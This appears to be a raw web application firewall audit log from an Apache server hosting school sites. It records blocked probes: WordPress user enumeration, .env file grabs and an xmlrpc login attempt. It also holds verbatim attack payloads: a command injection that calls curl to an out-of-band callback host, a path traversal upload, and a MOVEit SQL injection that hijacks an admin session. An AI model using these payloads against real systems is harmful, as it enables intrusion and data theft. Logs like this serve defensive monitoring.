Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33c7ad13-Z-- --ebf9fa4e-A-- [29/May/2025:10:28:28 +0700] aDfUXGMaQtTb69S13pj7tAAAAEs 103.236.140.4 59116 103.236.140.4 8181 --ebf9fa4e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.164.6.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.164.6.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ebf9fa4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ebf9fa4e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748489308029918 3013 (- - -) Stopwatch2: 1748489308029918 3013; combined=1318, p1=458, p2=831, p3=0, p4=0, p5=29, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ebf9fa4e-Z-- --7004996d-A-- [29/May/2025:10:35:54 +0700] aDfWGmMaQtTb69S13pj7ywAAAEY 103.236.140.4 59216 103.236.140.4 8181 --7004996d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 68.183.199.116 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 68.183.199.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --7004996d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7004996d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748489754408903 877 (- - -) Stopwatch2: 1748489754408903 877; combined=380, p1=335, p2=0, p3=0, p4=0, p5=45, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7004996d-Z-- --4d175928-A-- [29/May/2025:10:55:33 +0700] aDfatX1Ye2lUDKzW1LvN8QAAAAE 103.236.140.4 59436 103.236.140.4 8181 --4d175928-B-- POST /saas./resttosaasservlet HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 172 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/118.0 Safari/537.36 Content-Type: application/x-thrift X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 166791044 --4d175928-C-- [1,"createSupportBundle",1,0,{"1":{"str":"1111"},"2":{"str":"`curl d0rjil9gpeoh536h8tf0zpi9h943u13ub.oast.live`"},"3":{"str":"value3"},"4":{"lst":["str",2,"AAAA","BBBB"]}}] --4d175928-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d175928-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/x-thrift"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748490933954929 2516 (- - -) Stopwatch2: 1748490933954929 2516; combined=1678, p1=341, p2=1273, p3=21, p4=22, p5=20, sr=50, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d175928-Z-- --e7b5a331-A-- [29/May/2025:11:12:33 +0700] aDfescX5pbyFXv2T3iphLwAAANI 103.236.140.4 59536 103.236.140.4 8181 --e7b5a331-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.223.229.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.223.229.248 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e7b5a331-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7b5a331-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748491953859902 2801 (- - -) Stopwatch2: 1748491953859902 2801; combined=1255, p1=449, p2=776, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7b5a331-Z-- --fb27473c-A-- [29/May/2025:11:19:45 +0700] aDfgYWMaQtTb69S13pj73wAAAFQ 103.236.140.4 59860 103.236.140.4 8181 --fb27473c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 123.108.253.7 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 123.108.253.7 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --fb27473c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb27473c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748492385231771 2975 (- - -) Stopwatch2: 1748492385231771 2975; combined=1305, p1=465, p2=801, p3=0, p4=0, p5=39, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb27473c-Z-- --734fa158-A-- [29/May/2025:11:52:10 +0700] aDfn-mMaQtTb69S13pj8CQAAAEo 103.236.140.4 60220 103.236.140.4 8181 --734fa158-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 123.231.173.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 123.231.173.10 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --734fa158-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --734fa158-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748494330096074 3518 (- - -) Stopwatch2: 1748494330096074 3518; combined=1533, p1=505, p2=996, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --734fa158-Z-- --48e21026-A-- [29/May/2025:11:54:44 +0700] aDfolGMaQtTb69S13pj8DgAAAFI 103.236.140.4 60252 103.236.140.4 8181 --48e21026-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 31.10.62.126 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 31.10.62.126 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --48e21026-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --48e21026-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748494484032512 2850 (- - -) Stopwatch2: 1748494484032512 2850; combined=1298, p1=429, p2=838, p3=0, p4=0, p5=31, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48e21026-Z-- --d64ff47d-A-- [29/May/2025:12:00:34 +0700] aDfp8n1Ye2lUDKzW1LvOHwAAABA 103.236.140.4 60284 103.236.140.4 8181 --d64ff47d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 128.199.126.179 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 128.199.126.179 X-Forwarded-Proto: https Connection: close Content-Length: 498 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --d64ff47d-C-- system.multicallmethodNamewp.getUsersBlogsparamsrizalfadilrizalfadil!@#$%^&*() --d64ff47d-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --d64ff47d-E-- --d64ff47d-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1748494834567378 6054 (- - -) Stopwatch2: 1748494834567378 6054; combined=4376, p1=473, p2=3749, p3=23, p4=25, p5=64, sr=78, sw=42, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d64ff47d-Z-- --77ff273a-A-- [29/May/2025:12:11:36 +0700] aDfsiP4vV4CoZ0MKLMPljAAAAIA 103.236.140.4 60404 103.236.140.4 8181 --77ff273a-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: w3m/0.5.1 Accept-Charset: utf-8 --77ff273a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --77ff273a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748495496521244 800 (- - -) Stopwatch2: 1748495496521244 800; combined=327, p1=285, p2=0, p3=0, p4=0, p5=41, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77ff273a-Z-- --1d817b2c-A-- [29/May/2025:12:18:12 +0700] aDfuFP4vV4CoZ0MKLMPllgAAAI8 103.236.140.4 60448 103.236.140.4 8181 --1d817b2c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 121.101.134.115 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 121.101.134.115 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1d817b2c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d817b2c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748495892652301 2867 (- - -) Stopwatch2: 1748495892652301 2867; combined=1245, p1=426, p2=788, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d817b2c-Z-- --32e46126-A-- [29/May/2025:12:18:49 +0700] aDfuOf4vV4CoZ0MKLMPlmwAAAII 103.236.140.4 60460 103.236.140.4 8181 --32e46126-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 74.48.125.7 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 74.48.125.7 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --32e46126-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --32e46126-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748495929527802 2946 (- - -) Stopwatch2: 1748495929527802 2946; combined=1372, p1=476, p2=863, p3=0, p4=0, p5=33, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32e46126-Z-- --f677f010-A-- [29/May/2025:12:26:23 +0700] aDfv_2MaQtTb69S13pj8OwAAAEI 103.236.140.4 60598 103.236.140.4 8181 --f677f010-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 134.209.25.199 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 134.209.25.199 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --f677f010-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f677f010-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748496383775236 598 (- - -) Stopwatch2: 1748496383775236 598; combined=239, p1=217, p2=0, p3=0, p4=0, p5=21, sr=54, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f677f010-Z-- --c3a79a28-A-- [29/May/2025:12:36:08 +0700] aDfySGMaQtTb69S13pj8UAAAAE4 103.236.140.4 60738 103.236.140.4 8181 --c3a79a28-B-- POST /userentry?accountId=/../../../tomcat/webapps/UsTFY/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 124 User-Agent: Mozilla/5.0 (Ubuntu; Linux i686; rv:131.0) Gecko/20100101 Firefox/131.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 165250602 --c3a79a28-C-- xœ ðffábœŠ¼ð"AQN „…dœÃ\u ŒŒuMÌLÌôJ*JBC8˜Û§žcóK-­àf`dùÊÈÀÀ2¨:>Ä58„+À›‘IŽ—±`q &†-Pm–°B,A³ À›• ¢—‘!H‡‚M ?Ë --c3a79a28-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3a79a28-E-- --c3a79a28-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS_NAMES:x\x9c\v\xf0ff\xe1b\x00\x81\x9c\x8a\xbc\xf0"AQ\x0fN \x1b\x84\x85\x18d\x18\x9c\xc3\\u\x8d\x0c\x8c\x8cuM\xcc\x8dL\xcc\xf4J*JBC8\x19\x98\x1f\xdb\x05\xa7\x9ec\xf3K-\xad\xe0f`d\xf9\xca\xc8\xc0\xc0\x022\x01\xa8:>\xc458\x84 \xc0\x9b\x91I\x8e\x19\x97\xb1\x12`q\xa0 outside range: 1-255. 
[file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS_NAMES:x\x5cx9c\x5cv\x5cxf0ff\x5cxe1b\x5cx00\x5cx81\x5cx9c\x5cx8a\x5cxbc\x5cxf0\x22AQ\x5cx0fN \x5cx1b\x5cx84\x5cx85\x5cx18d\x5cx18\x5cx9c\x5cxc3\x5c\x5cu\x5cx8d\x5cx0c\x5cx8c\x5cx8cuM\x5cxcc\x5cx8dL\x5cxcc\x5cxf4J*JBC8\x5cx19\x5cx98\x5cx1f\x5cxdb\x5cx05\x5cxa7\x5cx9ec\x5cxf3K-\x5cxad\x5cxe0f`d\x5cxf9\x5cxca\x5cxc8\x5cxc0\x5cxc0\x5cx022\x5cx01\x5cxa8:>\x5cxc458\x5cx84 \x5cxc0\x5cx9b\x5cx91I\x5cx8e\x5cx19\x5cx97\x5cxb1\x5cx12`q\x5cxa0=x\x9c\x0b\xf0ff\xe1b\x00\x81\x9c Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748496968086320 3539 (- - -) Stopwatch2: 1748496968086320 3539; combined=2229, p1=376, p2=1825, p3=0, p4=0, p5=28, sr=77, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3a79a28-Z-- --c26ca62a-A-- [29/May/2025:12:41:44 +0700] aDfzmGMaQtTb69S13pj8WwAAAEM 103.236.140.4 60852 103.236.140.4 8181 --c26ca62a-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 0 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15 Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyUsername: Guest X-siLock-SessVar1: MyPkgAccessCode: 123 X-siLock-SessVar2: MyGuestEmailAddr: my_guest_email@example.com X-siLock-Transaction: session_setvars X-Forwarded-For: 206.82.6.62 Cookie: siLockLongTermInstID=0; SenayanMember=kcjohcup599bat2nh0jm8n37n1 X-Varnish: 169378682 --c26ca62a-C-- --c26ca62a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c26ca62a-E-- --c26ca62a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748497304408147 3047 (- - -) Stopwatch2: 1748497304408147 3047; combined=1507, p1=421, p2=1055, p3=0, p4=0, p5=30, sr=72, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c26ca62a-Z-- --910c2557-A-- [29/May/2025:12:41:55 +0700] aDfzo8X5pbyFXv2T3iphtwAAAMs 103.236.140.4 60866 103.236.140.4 8181 --910c2557-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 0 User-Agent: python-requests/2.26.0 Accept: */* Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyPkgID: 0 X-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO activesessions (SessionID) values ('2xjRiLJcsWiGWNHgy7ScqF2Ou42');UPDATE activesessions SET Username=(select Username from users order by permission desc limit 1) WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42';UPDATE activesessions SET LoginName='test@test.com' WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42';UPDATE activesessions SET RealName='test@test.com' WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42';UPDATE activesessions SET InstId='1234' WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42';UPDATE activesessions SET IpAddress='206.82.6.62' WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42';UPDATE activesessions SET LastTouch='2099-06-10 09:30:00' WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42';UPDATE activesessions SET DMZInterface='10' WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42';UPDATE activesessions SET Timeout='60' WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42';UPDATE activesessions SET ResilNode='10' WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42';UPDATE activesessions SET AcctReady='1' WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42'; -- asdf X-siLock-Transaction: session_setvars X-Forwarded-For: 206.82.6.62 Cookie: siLockLongTermInstID=0; SenayanMember=kcjohcup599bat2nh0jm8n37n1 X-Varnish: 169378688 --910c2557-C-- --910c2557-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close 
Content-Type: text/html; charset=iso-8859-1 --910c2557-E-- --910c2557-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748497315414863 3167 (- - -) Stopwatch2: 1748497315414863 3167; combined=1571, p1=461, p2=1080, p3=0, p4=0, p5=30, sr=87, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); 